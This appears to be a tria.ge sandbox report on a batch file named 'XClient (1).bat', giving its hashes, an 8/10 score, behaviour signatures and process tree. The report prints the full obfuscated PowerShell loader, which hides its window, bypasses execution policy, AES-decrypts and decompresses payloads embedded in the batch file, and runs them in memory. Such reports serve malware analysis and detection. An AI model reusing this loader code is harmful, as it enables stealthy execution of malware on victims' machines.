Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
07/11/2024, 23:56
241107-3zdm8a1aml 10Analysis
-
max time kernel
122s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/11/2024, 23:56
Static task
static1
Behavioral task
behavioral1
Sample
XClient (1).bat
Resource
win7-20240903-en
4 signatures
150 seconds
General
-
Target
XClient (1).bat
-
Size
72KB
-
MD5
73585d18685e06c4f21302c275ca6682
-
SHA1
dd0bae964a108a1c923a1f9b99e72f82064786dd
-
SHA256
b953aae6b09f2002ca056f6cef521960a91711152d5ebd5cf0055d9a491a5554
-
SHA512
00b2276e24b96b9b8c0629a1913f8a1c0ee7ab12e2fa4ce8f9b54fabeb02b0383eb183b1d45f16e86175108a9c7990f40a4671e29a2dde8400dbb60d3974b08a
-
SSDEEP
1536:PhOHtmQQ2yEPUWKzKbYd1P/OCWA7Vm6H/j5z5y3Wdjyh:YvTMKY1OCF0xWV+
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2412 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2412 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2916 wrote to memory of 2412 2916 cmd.exe 31 PID 2916 wrote to memory of 2412 2916 cmd.exe 31 PID 2916 wrote to memory of 2412 2916 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\XClient (1).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lt7J5oQYvdPE/yPR3udzzOgcuFCXB9kkjS82/1mR/YU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FE87bzzPEJCKUD9ywpxuRA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WEOQY=New-Object System.IO.MemoryStream(,$param_var); $YzqMc=New-Object System.IO.MemoryStream; $DahLb=New-Object System.IO.Compression.GZipStream($WEOQY, [IO.Compression.CompressionMode]::Decompress); $DahLb.CopyTo($YzqMc); $DahLb.Dispose(); $WEOQY.Dispose(); $YzqMc.Dispose(); $YzqMc.ToArray();}function execute_function($param_var,$param2_var){ $RqagN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HUCEB=$RqagN.EntryPoint; $HUCEB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient (1).bat';$qvcZY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient (1).bat').Split([Environment]::NewLine);foreach ($zHSKO in $qvcZY) { if ($zHSKO.StartsWith(':: ')) { $VrWEJ=$zHSKO.Substring(3); break; }}$payloads_var=[string[]]$VrWEJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-